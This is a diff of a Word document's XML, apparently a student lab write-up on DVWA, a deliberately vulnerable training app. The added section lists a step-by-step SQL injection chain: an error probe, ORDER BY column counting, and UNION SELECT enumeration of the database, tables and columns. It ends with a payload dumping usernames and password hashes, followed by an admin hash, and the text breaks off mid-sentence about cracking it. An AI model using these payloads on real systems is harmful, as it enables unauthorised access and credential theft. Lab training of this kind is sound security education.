--- a/Part C/Part C - DVWA.docx
+++ b/Part C/Part C - DVWA.docx
@@ -2174,16 +2174,34 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2E5090"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2E5090"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Questions to Answer</w:t>
       </w:r>
     </w:p>
@@ -2203,7 +2221,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Why does High security change where the input is sent? Read the PHP source (View Source button) after completing the task.</w:t>
       </w:r>
     </w:p>
@@ -2382,9 +2399,1273 @@
       </w:tr>
     </w:tbl>
     <w:p/>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D9FC84" wp14:editId="4E554CD0">
+            <wp:extent cx="2489988" cy="2003708"/>
+            <wp:effectExtent l="76200" t="76200" r="139065" b="130175"/>
+            <wp:docPr id="34370622" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="34370622" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2493029" cy="2006155"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln w="38100" cap="sq">
+                      <a:solidFill>
+                        <a:srgbClr val="000000"/>
+                      </a:solidFill>
+                      <a:prstDash val="solid"/>
+                      <a:miter lim="800000"/>
+                    </a:ln>
+                    <a:effectLst>
+                      <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
+                        <a:srgbClr val="000000">
+                          <a:alpha val="43000"/>
+                        </a:srgbClr>
+                      </a:outerShdw>
+                    </a:effectLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Queries:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>If the page throws a MySQL error, the field is injectable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>When it errors on ORDER BY 3, you know there are 2 columns.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t># is MySQL's inline comment character and works here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' ORDER BY 1# </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' ORDER BY 2# </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1' ORDER BY 3#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>Determine which column position renders text on screen (usually both do in DVWA).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' UNION SELECT null, null# </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' UNION SELECT 'a', null# </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1' UNION SELECT null, 'a'#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">This reveals the current database name (e.g., </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>dvwa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>database(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>), null#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>You'll see tables like users and guestbook.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, null FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>database(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t xml:space="preserve">You'll </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>see:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>first_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>last_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>, user, password, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>column_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, null FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>schema.columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>='users'#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>Get admin username and password hash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t>admin :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-PK"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1' UNION SELECT user, password FROM users#</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Password break into </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
